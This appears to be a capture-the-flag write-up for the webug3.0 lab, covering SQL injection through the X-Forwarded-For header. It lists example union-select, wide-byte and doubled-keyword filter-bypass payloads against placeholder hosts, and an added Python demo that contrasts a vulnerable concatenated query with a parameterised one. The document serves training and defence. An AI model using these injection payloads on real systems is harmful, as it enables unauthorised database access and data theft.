webug3.0 level 5 notes

Disclaimer: This is an original article by the blogger, released under the CC 4.0 BY-SA license. When reproducing it, please attach the original source link and this statement.
Article link: https://blog.csdn.net/weixin_43460822/article/details/95631373

Challenge:

(1) Header injection mainly targets these locations: X-Forwarded-For, User-Agent, and Referer. Hoping that one of them was an unprotected injection point, I ran a simple injection test against each and found that X-Forwarded-For is injectable.

 

(2) Having confirmed that X-Forwarded-For is injectable, inject through it: X-Forwarded-For: union select 1,2,3, flag from flag

 

This returns the final injection result.

Background notes:

1. X-Forwarded-For (XFF) is an HTTP request header field used to identify the original IP address of a client that connects to a web server through an HTTP proxy or load balancer.

2. User-Agent (UA) is a special header string that lets the server identify the client's operating system and version, CPU type, browser and version, browser rendering engine, browser language, browser plug-ins, and so on.

3. Referer: see https://www.cnblogs.com/bukudekong/p/3829852.html

4. Common injection types

(1) Regular injection

Get table names ----------------
http://xxxxxx/sql1/index.php?id=1' union select 1,2,table_name from information_schema.tables where table_schema=database()%23
Get column names ----------------
http://xxxxxx/sql1/index.php?id=1' union select 1,2,column_name from information_schema.columns where table_name='flag'%23
Get the data ----------------
http://xxxxxx/sql1/index.php?id=1' union select 1,2,flag from flag%23

(2) Wide-byte injection

%df followed by the \ that addslashes inserts is read as a single Chinese (wide-byte) character, which swallows the \ and bypasses the addslashes filtering rule.
http://xxxxxx/sql2/index.php?id=1%df' union select 1,2,flag from flag %23

(3) Keyword replacement

The filter works by replacing keywords, but it replaces them only once, so a keyword can be embedded inside itself to bypass the filter.
http://xxxxxx/sql3/index.php?id=1' uniunionon selselectect 1,2,flag frfromom flag %23
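
Added example (not part of the original post or the webug code): a Python/sqlite3 demonstration of why an X-Forwarded-For value concatenated into SQL stays injectable behind the single-pass keyword filter from (3), next to a version that validates the header as an IP address and binds it as a parameter. The table layout, the quoted query shape, the function names and the sample values are assumptions constructed for illustration.

```python
import ipaddress
import sqlite3

def make_db():
    """Constructed in-memory tables standing in for the lab database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE visits (id INTEGER, ip TEXT, ua TEXT, note TEXT);
        CREATE TABLE flag (flag TEXT);
        INSERT INTO visits VALUES (1, '203.0.113.7', 'curl/8', 'first visit');
        INSERT INTO flag VALUES ('flag{constructed-sample}');
    """)
    return db

def strip_keywords_once(value):
    """Single-pass keyword blacklist, the filter style from case (3)."""
    for keyword in ("union", "select", "from"):
        value = value.replace(keyword, "")
    return value

def lookup_vulnerable(db, xff):
    """Header text is filtered, then concatenated into the SQL string."""
    sql = ("SELECT id, ip, ua, note FROM visits WHERE ip = '"
           + strip_keywords_once(xff) + "'")
    return db.execute(sql).fetchall()

def lookup_hardened(db, xff):
    """Accept only a syntactically valid IP and bind it as a parameter."""
    first_hop = xff.split(",")[0].strip()  # XFF may list several proxies
    try:
        ip = str(ipaddress.ip_address(first_hop))
    except ValueError:
        return []  # not an address: reject instead of querying
    return db.execute(
        "SELECT id, ip, ua, note FROM visits WHERE ip = ?", (ip,)
    ).fetchall()

# Constructed header values: a normal one and a doubled-keyword payload
# in the style of case (3), adapted to the quoted context assumed above.
NORMAL = "203.0.113.7"
PAYLOAD = "' uniunionon selselectect 1,2,3,flag frfromom flag -- "

if __name__ == "__main__":
    db = make_db()
    for value in (NORMAL, PAYLOAD):
        print(repr(value))
        print("  vulnerable:", lookup_vulnerable(db, value))
        print("  hardened:  ", lookup_hardened(db, value))
```

The filter rebuilds the keywords it removes, so the concatenated query returns the flag row, while the bound query never interprets the header as SQL.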

 

References:

1. Common injection types: https://www.jianshu.com/p/18e94eb06c2a

2. Exp10 Final: CTF-style (Webug3.0 vulnerable target range, penetration basics): https://www.cnblogs.com/PegasusLife/p/10886420.html

 

 

 
